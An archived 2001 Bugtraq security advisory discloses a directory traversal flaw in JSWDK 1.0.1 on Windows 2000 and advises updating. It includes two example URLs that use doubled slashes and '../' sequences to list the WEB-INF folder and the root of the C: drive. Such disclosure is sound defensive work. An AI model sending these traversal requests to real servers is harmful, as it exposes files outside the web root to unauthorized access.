[19915] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

CHINANSL Security Advisory(CSA-200106)

daemon@ATHENA.MIT.EDU (lovehacker)
Wed Mar 28 20:54:57 2001

Message-ID:  <20010328064807.21266.qmail@securityfocus.com>
Date:         Wed, 28 Mar 2001 06:48:07 -0000
Reply-To: lovehacker@263.NET
From: lovehacker <lovehacker@263.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

Topic:
JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 
Directory traversal Vulnerability

vulnerable:
Microsoft Win2000
ĄĄĄĄ+JSWDK1.0.1
maybe for other operating system also.

discussion:
A security vulnerability has been found in Windows 
NT/2000 systems that have JSWDK 1.0.1 
installed.The vulnerability allows remote attackers to 
access files outside the document root directory 
scope.

exploits:
http://localhost:8080/examples//WEB-INF/ 
listing /WEB-INF/ Directory .

http://localhost:8080/../examples//WEB-INF/../../../../../
if JSWDK installd in c:\ the question will listing c:\ all 
file and directory.

solution:
Update JSWDK

Copyright 2000-2001 CHINANSL. All Rights 
Reserved. Terms of use. 

CHINANSL Security Team 
<lovehacker@chinansl.com> 
CHINANSL INFORMATION TECHNOLOGY CO.,LTD 
(http://www.chinansl.com)


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[19915] in bugtraq

CHINANSL Security Advisory(CSA-200106)

daemon@ATHENA.MIT.EDU (lovehacker)Wed Mar 28 20:54:57 2001

daemon@ATHENA.MIT.EDU (lovehacker)
Wed Mar 28 20:54:57 2001